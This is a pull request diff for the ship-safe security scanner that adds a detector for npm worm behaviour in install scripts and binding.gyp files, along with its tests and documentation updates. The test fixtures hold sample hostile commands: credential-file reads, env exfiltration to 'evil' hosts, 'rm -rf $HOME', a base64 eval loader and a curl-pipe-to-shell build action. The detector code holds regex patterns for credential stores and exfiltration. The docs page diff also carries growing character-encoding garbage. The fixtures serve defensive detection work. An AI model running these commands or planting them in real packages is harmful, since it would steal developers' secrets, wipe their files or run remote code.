### PR TITLE
Add InstallGuardAgent — npm worm / binding.gyp hardening (v9.5.0 P1)

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -69,8 +69,21 @@ model supply chain.
 - RobloxSecurityAgent no longer carries the ClickFix rule (moved to
   ClickFixAgent); its Roblox-specific coverage is unchanged.
 
+- **InstallGuardAgent** (29th agent, Supply Chain category) — hardens against
+  the Shai-Hulud / Miasma self-propagating npm worm lineage at the two auto-run
+  entry points:
+  - `WORM_LIFECYCLE_CRED_HARVEST` (critical) — a `pre/postinstall`-class script
+    that reads a credential store (`~/.npmrc`, `~/.aws/credentials`, `~/.ssh`,
+    `GITHUB_TOKEN`, `AWS_*`, `VAULT_TOKEN`, …).
+  - `WORM_LIFECYCLE_EXFIL` (critical) — a lifecycle script exfiltrating env /
+    secrets over the network.
+  - `WORM_LIFECYCLE_DESTRUCTIVE` (high) — `rm -rf $HOME`-class commands.
+  - `WORM_LIFECYCLE_OBFUSCATED_EXEC` (high) — `node -e` / `eval` / base64.
+  - `WORM_BINDING_GYP` (high) — a weaponized `binding.gyp` node-gyp action that
+    fetches, spawns, or evaluates rather than compiles. Maps to CWE-506, CWE-829.
+
 ### Changed
-- Agent count 24 → 28 across CLI, README, docs, and marketing site.
+- Agent count 24 → 29 across CLI, README, docs, and marketing site.
 
 ### Tests
 - 23 net new tests (212 → 235): ModelScan payload detection, unsafe-format flagging,

--- a/README.md
+++ b/README.md
@@ -37,7 +37,7 @@ No signup. No API key required for scanning. Works offline for core checks.
 # Interactive REPL: scan, fix, and ask questions in one session
 npx ship-safe
 
-# Full audit: secrets + 28 agents + deps + remediation plan
+# Full audit: secrets + 29 agents + deps + remediation plan
 npx ship-safe audit .
 
 # Interactive fix agent: plan, diff, approve, verify
@@ -132,6 +132,7 @@ All agents run in parallel. Each skips irrelevant projects automatically.
 | **TrustBoundaryAgent** | Agentic | GhostApproval symlink attacks (config-named links into `~/.ssh`/`~/.aws`/`.env`), repo symlinks escaping the tree, and Friendly Fire run-on-review instructions in agent-read docs (CWE-59, CWE-61) |
 | **SlopSquatAgent** | Supply Chain | Hallucinated / phantom package imports (slopsquatting) — bare imports not declared, installed, or builtin, plus known AI-hallucinated names (CWE-1357) |
 | **ClickFixAgent** | Supply Chain | ClickFix / fake-CAPTCHA paste-and-run lures (fake error + Win+R/Ctrl+V/command-bar keystrokes, PowerShell cradles) and fake-installer npm lifecycle scripts (CWE-1357, CWE-506) |
+| **InstallGuardAgent** | Supply Chain | npm worm behaviors in lifecycle scripts (credential harvesting, env exfiltration, destructive `rm -rf`, obfuscated `node -e`) and weaponized `binding.gyp` node-gyp actions (CWE-506, CWE-829) |
 
 **Post-processors:** ScoringEngine Â· VerifierAgent (secrets liveness) Â· DeepAnalyzer (LLM taint analysis)
 

--- a/cli/__tests__/install-guard-agent.test.js
+++ b/cli/__tests__/install-guard-agent.test.js
@@ -1,0 +1,79 @@
+/**
+ * Ship Safe — InstallGuardAgent
+ * ==============================
+ *
+ * Verifies npm lifecycle-script worm behaviors (cred harvest, exfil,
+ * destructive, obfuscated) and weaponized binding.gyp, with FP guards.
+ *
+ * Run: npm test
+ */
+
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import fs from 'fs';
+import path from 'path';
+import os from 'os';
+
+import { InstallGuardAgent } from '../agents/install-guard-agent.js';
+
+function tmp() { return fs.mkdtempSync(path.join(os.tmpdir(), 'shipsafe-worm-')); }
+function cleanup(dir) { try { fs.rmSync(dir, { recursive: true, force: true }); } catch { /* */ } }
+
+async function withPkg(scripts) {
+  const dir = tmp();
+  fs.writeFileSync(path.join(dir, 'package.json'), JSON.stringify({ name: 'x', scripts }));
+  const f = await new InstallGuardAgent().analyze({ rootPath: dir, files: [], recon: {}, options: {} });
+  cleanup(dir);
+  return f;
+}
+
+describe('InstallGuardAgent — lifecycle scripts', () => {
+  it('flags credential harvesting in preinstall', async () => {
+    const f = await withPkg({ preinstall: 'cat ~/.aws/credentials && cp ~/.npmrc /tmp/x' });
+    assert.ok(f.some((x) => x.rule === 'WORM_LIFECYCLE_CRED_HARVEST' && x.severity === 'critical'));
+  });
+
+  it('flags env exfiltration in postinstall', async () => {
+    const f = await withPkg({ postinstall: 'curl -X POST https://evil/c2 -d "$(printenv)"' });
+    assert.ok(f.some((x) => x.rule === 'WORM_LIFECYCLE_EXFIL'));
+  });
+
+  it('flags destructive rm -rf $HOME', async () => {
+    const f = await withPkg({ postinstall: 'rm -rf $HOME/*' });
+    assert.ok(f.some((x) => x.rule === 'WORM_LIFECYCLE_DESTRUCTIVE'));
+  });
+
+  it('flags obfuscated node -e eval', async () => {
+    const f = await withPkg({ install: 'node -e "eval(Buffer.from(process.argv[1],\'base64\').toString())"' });
+    assert.ok(f.some((x) => x.rule === 'WORM_LIFECYCLE_OBFUSCATED_EXEC'));
+  });
+
+  it('stays quiet on a normal build postinstall', async () => {
+    const f = await withPkg({ postinstall: 'node ./scripts/build.js && tsc' });
+    assert.equal(f.length, 0);
+  });
+});
+
+describe('InstallGuardAgent — binding.gyp', () => {
+  it('flags a weaponized binding.gyp action', async () => {
+    const dir = tmp();
+    try {
+      fs.writeFileSync(path.join(dir, 'binding.gyp'), JSON.stringify({
+        targets: [{ target_name: 'x', actions: [{ action_name: 'p', action: ['node', '-e', 'require("child_process").exec("curl https://evil.sh|sh")'] }] }],
+      }));
+      const f = await new InstallGuardAgent().analyze({ rootPath: dir, files: [], recon: {}, options: {} });
+      assert.ok(f.some((x) => x.rule === 'WORM_BINDING_GYP'));
+    } finally { cleanup(dir); }
+  });
+
+  it('does not flag a normal binding.gyp', async () => {
+    const dir = tmp();
+    try {
+      fs.writeFileSync(path.join(dir, 'binding.gyp'), JSON.stringify({
+        targets: [{ target_name: 'addon', sources: ['src/addon.cc'] }],
+      }));
+      const f = await new InstallGuardAgent().analyze({ rootPath: dir, files: [], recon: {}, options: {} });
+      assert.equal(f.filter((x) => x.rule === 'WORM_BINDING_GYP').length, 0);
+    } finally { cleanup(dir); }
+  });
+});

--- a/cli/agents/index.js
+++ b/cli/agents/index.js
@@ -37,6 +37,7 @@ export { ModelScanAgent } from './model-scan-agent.js';
 export { TrustBoundaryAgent } from './trust-boundary-agent.js';
 export { SlopSquatAgent } from './slopsquat-agent.js';
 export { ClickFixAgent } from './clickfix-agent.js';
+export { InstallGuardAgent } from './install-guard-agent.js';
 export { ABOMGenerator } from './abom-generator.js';
 export { VerifierAgent } from './verifier-agent.js';
 export { DeepAnalyzer } from './deep-analyzer.js';
@@ -46,7 +47,7 @@ export { PolicyEngine } from './policy-engine.js';
 export { HTMLReporter } from './html-reporter.js';
 
 /**
- * Create a fully configured orchestrator with all 28 scanning agents.
+ * Create a fully configured orchestrator with all 29 scanning agents.
  * (VerifierAgent and DeepAnalyzer run as post-processors, not in the agent pool.)
  *
  * Plugin system: if rootPath is provided, custom agents from
@@ -82,6 +83,7 @@ import { ModelScanAgent as ModelScanAgentClass } from './model-scan-agent.js';
 import { TrustBoundaryAgent as TrustBoundaryAgentClass } from './trust-boundary-agent.js';
 import { SlopSquatAgent as SlopSquatAgentClass } from './slopsquat-agent.js';
 import { ClickFixAgent as ClickFixAgentClass } from './clickfix-agent.js';
+import { InstallGuardAgent as InstallGuardAgentClass } from './install-guard-agent.js';
 import { loadPlugins } from '../utils/plugin-loader.js';
 
 const BUILT_IN_AGENTS = () => [
@@ -113,6 +115,7 @@ const BUILT_IN_AGENTS = () => [
   new TrustBoundaryAgentClass(),
   new SlopSquatAgentClass(),
   new ClickFixAgentClass(),
+  new InstallGuardAgentClass(),
 ];
 
 /** Synchronous build — no plugin support. Used by legacy callers. */

--- a/cli/agents/install-guard-agent.js
+++ b/cli/agents/install-guard-agent.js
@@ -1,0 +1,127 @@
+/**
+ * InstallGuardAgent — npm lifecycle-script & native-build worm hardening
+ * =====================================================================
+ *
+ * The Shai-Hulud → Mini Shai-Hulud → Miasma lineage of self-propagating npm
+ * worms (2025–2026) share a playbook: run before defenses engage via a
+ * lifecycle script or a weaponized `binding.gyp`, harvest developer/CI
+ * credentials (npm, GitHub, AWS, GCP, Azure, Vault, K8s), self-spread, then
+ * turn destructive (wiping home directories) when no creds are found.
+ *
+ * This agent inspects the two auto-run entry points that other agents don't
+ * cover in depth: npm `pre/postinstall`-class scripts and `binding.gyp`
+ * (node-gyp) build files, for credential harvesting, obfuscated execution, and
+ * destructive commands.
+ *
+ * (Plain `curl | bash` fake installers are covered by ClickFixAgent; this
+ * agent targets the credential-theft / destruction / obfuscation behaviors.)
+ *
+ * Maps to: CWE-506 (Embedded Malicious Code), CWE-829, CWE-77. Class: Supply Chain.
+ */
+
+import fs from 'fs';
+import path from 'path';
+import fg from 'fast-glob';
+import { BaseAgent, createFinding } from './base-agent.js';
+import { SKIP_DIRS } from '../utils/patterns.js';
+
+const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare', 'preuninstall', 'prepublishOnly'];
+
+// Credential / secret stores a lifecycle script should never touch.
+const CRED_PATHS = /(?:~|\$HOME|%USERPROFILE%)?[/\\]?\.(?:npmrc|netrc|aws[/\\]credentials|ssh[/\\]|docker[/\\]config|kube[/\\]|config[/\\]gcloud|gnupg|git-credentials)\b|\bnpm_token\b|GITHUB_TOKEN|AWS_(?:SECRET_)?ACCESS_KEY|VAULT_TOKEN/i;
+// Obfuscated / dynamic execution.
+const OBFUSCATED = /node\s+(?:-e|--eval)\b|\beval\s*\(|\batob\s*\(|Buffer\.from\s*\([^)]*['"]base64['"]|frombase64string|[|`$]\(.*base64/i;
+// Destructive commands aimed at the home dir / root.
+const DESTRUCTIVE = /\brm\s+-rf?\s+(?:~|\$HOME|\/\s|\/\*|\.\.?\/)|\brmdir\s+\/s|\bdel\s+\/[fsq]|\bRemove-Item\b[^\n]*-Recurse[^\n]*(?:HOME|~)/i;
+// Network exfil of environment / secrets.
+const EXFIL = /(?:curl|wget|fetch|Invoke-RestMethod|http[s]?:\/\/)[^\n]{0,120}(?:\$\{?(?:process\.)?env|printenv|\benv\b|\$AWS|\$GITHUB|token|secret)/i;
+
+export class InstallGuardAgent extends BaseAgent {
+  constructor() {
+    super(
+      'InstallGuardAgent',
+      'Detects npm worm behaviors in lifecycle scripts and binding.gyp: credential harvesting, obfuscated execution, and destructive commands',
+      'supply-chain'
+    );
+  }
+
+  shouldRun() {
+    return true;
+  }
+
+  async analyze(context) {
+    const { rootPath } = context;
+    const findings = [];
+
+    findings.push(...this._scanLifecycle(rootPath));
+    findings.push(...await this._scanBindingGyp(rootPath));
+
+    return findings;
+  }
+
+  _scanLifecycle(rootPath) {
+    const pkgPath = path.join(rootPath, 'package.json');
+    if (!fs.existsSync(pkgPath)) return [];
+    let pkg;
+    try { pkg = JSON.parse(fs.readFileSync(pkgPath, 'utf-8')); } catch { return []; }
+    const scripts = pkg.scripts || {};
+    const findings = [];
+
+    for (const name of LIFECYCLE) {
+      const cmd = scripts[name];
+      if (typeof cmd !== 'string') continue;
+      const checks = [
+        { re: CRED_PATHS, rule: 'WORM_LIFECYCLE_CRED_HARVEST', sev: 'critical', what: 'reads a credential / secret store' },
+        { re: EXFIL, rule: 'WORM_LIFECYCLE_EXFIL', sev: 'critical', what: 'exfiltrates environment variables or secrets over the network' },
+        { re: DESTRUCTIVE, rule: 'WORM_LIFECYCLE_DESTRUCTIVE', sev: 'high', what: 'runs a destructive command against the home directory' },
+        { re: OBFUSCATED, rule: 'WORM_LIFECYCLE_OBFUSCATED_EXEC', sev: 'high', what: 'runs obfuscated / dynamically-evaluated code' },
+      ];
+      for (const c of checks) {
+        if (c.re.test(cmd)) {
+          findings.push(createFinding({
+            file: pkgPath, line: 0, severity: c.sev, category: 'supply-chain',
+            rule: c.rule,
+            title: `npm ${name} script ${c.what}`,
+            description: `The \`${name}\` lifecycle script ${c.what}. Lifecycle scripts run automatically on install, before most defenses engage — the entry point used by the Shai-Hulud / Miasma npm worms.`,
+            matched: cmd.slice(0, 120),
+            confidence: 'high', cwe: 'CWE-506',
+            fix: `Remove this behavior from \`${name}\`. Installation must never read credentials, exfiltrate env, run obfuscated code, or delete files.`,
+          }));
+        }
+      }
+    }
+    return findings;
+  }
+
+  async _scanBindingGyp(rootPath) {
+    const files = await fg(['**/binding.gyp'], {
+      cwd: rootPath, absolute: true, onlyFiles: true,
+      ignore: Array.from(SKIP_DIRS).map((d) => `**/${d}/**`),
+    });
+    const findings = [];
+    const SUSPICIOUS = /(?:curl|wget)\b|https?:\/\/[^\s"']+\.(?:sh|js|py|exe)|node\s+-e\b|child_process|frombase64string|Buffer\.from\s*\([^)]*base64|\beval\s*\(|\.npmrc|\.aws|\.ssh/i;
+
+    for (const file of files) {
+      const content = this.readFile(file);
+      if (!content) continue;
+      // A binding.gyp with an "actions"/"action" that runs network/obfuscated
+      // code — not plain codegen — is a node-gyp worm launcher.
+      if (/["']actions?["']/.test(content) && SUSPICIOUS.test(content)) {
+        const m = content.match(SUSPICIOUS);
+        const line = m ? content.slice(0, content.indexOf(m[0])).split('\n').length : 0;
+        findings.push(createFinding({
+          file, line, severity: 'high', category: 'supply-chain',
+          rule: 'WORM_BINDING_GYP',
+          title: 'Weaponized binding.gyp (node-gyp) action',
+          description: 'This binding.gyp defines a build action that fetches remote content, spawns a subprocess, or runs obfuscated code — not native compilation. node-gyp executes it automatically during `npm install` (the binding.gyp / Miasma worm technique).',
+          matched: (m && m[0]) ? m[0].slice(0, 80) : 'binding.gyp action',
+          confidence: 'medium', cwe: 'CWE-829',
+          fix: 'Inspect the binding.gyp action. A native addon build should only compile sources — never download, spawn shells, or evaluate encoded strings.',
+        }));
+      }
+    }
+    return findings;
+  }
+}
+
+export default InstallGuardAgent;

--- a/package.json
+++ b/package.json
@@ -1,7 +1,7 @@
 {
   "name": "ship-safe",
   "version": "9.5.0",
-  "description": "AI-powered multi-agent security platform. 28 agents scan 80+ attack classes including AI integration supply chain (Vercel-class attacks), Hermes Agent deployments (ASI-01–ASI-10), tool registry poisoning, function-call injection, skill permission drift, and agent attestation. Ship Safe × Hermes Agent.",
+  "description": "AI-powered multi-agent security platform. 29 agents scan 80+ attack classes including AI integration supply chain (Vercel-class attacks), Hermes Agent deployments (ASI-01–ASI-10), tool registry poisoning, function-call injection, skill permission drift, and agent attestation. Ship Safe × Hermes Agent.",
   "main": "cli/index.js",
   "bin": {
     "ship-safe": "cli/bin/ship-safe.js"

--- a/webapp/app/docs/page.tsx
+++ b/webapp/app/docs/page.tsx
@@ -6,13 +6,13 @@ const ogImage = 'https://www.shipsafecli.com/og1.png';
 
 export const metadata: Metadata = {
   title: 'Documentation',
-  description: 'Complete Ship Safe documentation: LLM vulnerability CLI commands, MCP configuration security scanning, RAG poisoning detection, CI/CD integration, 28 agent reference, and API docs.',
+  description: 'Complete Ship Safe documentation: LLM vulnerability CLI commands, MCP configuration security scanning, RAG poisoning detection, CI/CD integration, 29 agent reference, and API docs.',
   keywords: ['Ship Safe docs', 'LLM vulnerability CLI', 'MCP configuration security', 'RAG poisoning detection', 'AI agent security scanner', 'ship-safe commands', 'ship-safe agents', 'DevSecOps documentation', 'OWASP Agentic AI Top 10'],
   alternates: {
     canonical: 'https://www.shipsafecli.com/docs',
   },
   openGraph: {
-    title: 'Ship Safe Documentation Ã¢ÂÂ v9.5.0',
+    title: 'Ship Safe Documentation ÃÂ¢ÃÂÃÂ v9.5.0',
     description: 'Every command, agent, and flag. LLM vulnerability CLI, MCP security configuration, RAG poisoning detection, CI/CD integration, and API reference.',
     type: 'website',
     url: 'https://www.shipsafecli.com/docs',
@@ -21,7 +21,7 @@ export const metadata: Metadata = {
   },
   twitter: {
     card: 'summary_large_image',
-    title: 'Ship Safe Documentation Ã¢ÂÂ v9.5.0',
+    title: 'Ship Safe Documentation ÃÂ¢ÃÂÃÂ v9.5.0',
     description: 'Every command, agent, and flag. LLM vulnerability CLI, MCP security configuration, RAG poisoning detection, CI/CD integration, and API reference.',
     images: [ogImage],
   },
@@ -41,7 +41,7 @@ export default function Docs() {
     <>
       <script
         type="application/ld+json"
-        dangerouslySetInnerHTML={{ __html: JSON.stringify(jsonLd) }} // ship-safe-ignore Ã¢ÂÂ static JSON-LD, no user input
+        dangerouslySetInnerHTML={{ __html: JSON.stringify(jsonLd) }} // ship-safe-ignore ÃÂ¢ÃÂÃÂ static JSON-LD, no user input
       />
       <Nav />
       <main className={styles.docsPage}>
@@ -52,7 +52,7 @@ export default function Docs() {
               <a href="#installation">Installation</a>
               <a href="#quick-start">Quick Start</a>
               <a href="#commands">Commands</a>
-              <a href="#agents">28 Security Agents</a>
+              <a href="#agents">29 Security Agents</a>
               <a href="#scoring">Scoring System</a>
               <a href="#cicd">CI/CD Integration</a>
               <a href="#github-action">GitHub Action</a>
@@ -73,12 +73,12 @@ export default function Docs() {
               <span className={styles.sectionLabel}>// docs</span>
               <h1>Ship Safe CLI</h1>
               <p className={styles.subtitle}>
-                28 AI security agents. 80+ attack classes. One command.
+                29 AI security agents. 80+ attack classes. One command.
               </p>
               <pre className={styles.heroCode}><code>npx ship-safe audit .</code></pre>
             </header>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ Installation Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ Installation ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="installation">
               <h2>Installation</h2>
               <p>Ship Safe requires Node.js 18 or later. No signup or API key required.</p>
@@ -94,13 +94,13 @@ export OPENAI_API_KEY=sk-...
 export GOOGLE_AI_API_KEY=AIza...`}</code></pre>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ Quick Start Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ Quick Start ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="quick-start">
               <h2>Quick Start</h2>
               <pre><code>{`# Full security audit with remediation plan + HTML report
 npx ship-safe audit .
 
-# Red team: 28 agents, 80+ attack classes
+# Red team: 29 agents, 80+ attack classes
 npx ship-safe red-team .
 
 # Quick secret scan
@@ -119,7 +119,7 @@ npx ship-safe diff --staged
 npx ship-safe ci . --threshold 80`}</code></pre>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ Commands Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ Commands ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="commands">
               <h2>Commands</h2>
 
@@ -128,8 +128,8 @@ npx ship-safe ci . --threshold 80`}</code></pre>
                 <table>
                   <thead><tr><th>Command</th><th>Description</th></tr></thead>
                   <tbody>
-                    <tr><td><code>audit .</code></td><td>Full audit: secrets + 28 agents + deps + remediation plan + HTML report</td></tr>
-                    <tr><td><code>red-team .</code></td><td>Run 28 agents with 80+ attack classes</td></tr>
+                    <tr><td><code>audit .</code></td><td>Full audit: secrets + 29 agents + deps + remediation plan + HTML report</td></tr>
+                    <tr><td><code>red-team .</code></td><td>Run 29 agents with 80+ attack classes</td></tr>
                     <tr><td><code>scan .</code></td><td>Secret scanner (pattern matching + entropy scoring)</td></tr>
                     <tr><td><code>score .</code></td><td>Security health score (0-100, A-F grade)</td></tr>
                     <tr><td><code>deps .</code></td><td>Dependency CVE audit with EPSS scores</td></tr>
@@ -144,12 +144,12 @@ npx ship-safe ci . --threshold 80`}</code></pre>
                   <thead><tr><th>Command</th><th>Description</th></tr></thead>
                   <tbody>
                     <tr><td><code>ship-safe</code></td><td>Drop into the interactive REPL (bare invocation on a TTY)</td></tr>
-                    <tr><td><code>shell .</code></td><td>Explicit REPL Ã¢ÂÂ slash commands, streaming LLM, persistent session</td></tr>
-                    <tr><td><code>agent .</code></td><td>Interactive fix loop: scan Ã¢ÂÂ plan Ã¢ÂÂ diff Ã¢ÂÂ accept/skip/edit/quit Ã¢ÂÂ verify</td></tr>
+                    <tr><td><code>shell .</code></td><td>Explicit REPL ÃÂ¢ÃÂÃÂ slash commands, streaming LLM, persistent session</td></tr>
+                    <tr><td><code>agent .</code></td><td>Interactive fix loop: scan ÃÂ¢ÃÂÃÂ plan ÃÂ¢ÃÂÃÂ diff ÃÂ¢ÃÂÃÂ accept/skip/edit/quit ÃÂ¢ÃÂÃÂ verify</td></tr>
                     <tr><td><code>agent . --plan-only</code></td><td>Preview fix plans without writing any files</td></tr>
                     <tr><td><code>agent . --severity critical</code></td><td>Only plan/fix findings at the given severity or above</td></tr>
                     <tr><td><code>agent . --branch --pr</code></td><td>Commit fixes on a new branch and open a PR via <code>gh</code></td></tr>
-                    <tr><td><code>agent . --yolo --branch</code></td><td>Unattended CI mode Ã¢ÂÂ auto-accept all plans</td></tr>
+                    <tr><td><code>agent . --yolo --branch</code></td><td>Unattended CI mode ÃÂ¢ÃÂÃÂ auto-accept all plans</td></tr>
                     <tr><td><code>undo</code></td><td>Revert the last fix applied by the agent</td></tr>
                     <tr><td><code>undo --all</code></td><td>Revert every fix in <code>.ship-safe/fixes.jsonl</code></td></tr>
                   </tbody>
@@ -183,7 +183,7 @@ npx ship-safe ci . --threshold 80`}</code></pre>
                 <table>
                   <thead><tr><th>Command</th><th>Description</th></tr></thead>
                   <tbody>
-                    <tr><td><code>hooks install</code></td><td>Install real-time Claude Code hooks Ã¢ÂÂ block secrets before they land on disk</td></tr>
+                    <tr><td><code>hooks install</code></td><td>Install real-time Claude Code hooks ÃÂ¢ÃÂÃÂ block secrets before they land on disk</td></tr>
                     <tr><td><code>hooks status</code></td><td>Check if Claude Code hooks are installed</td></tr>
                     <tr><td><code>hooks remove</code></td><td>Uninstall Claude Code hooks</td></tr>
                     <tr><td><code>remediate .</code></td><td>Auto-fix hardcoded secrets (rewrite code + write .env)</td></tr>
@@ -254,9 +254,9 @@ npx ship-safe ci . --threshold 80`}</code></pre>
               </div>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ Agents Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
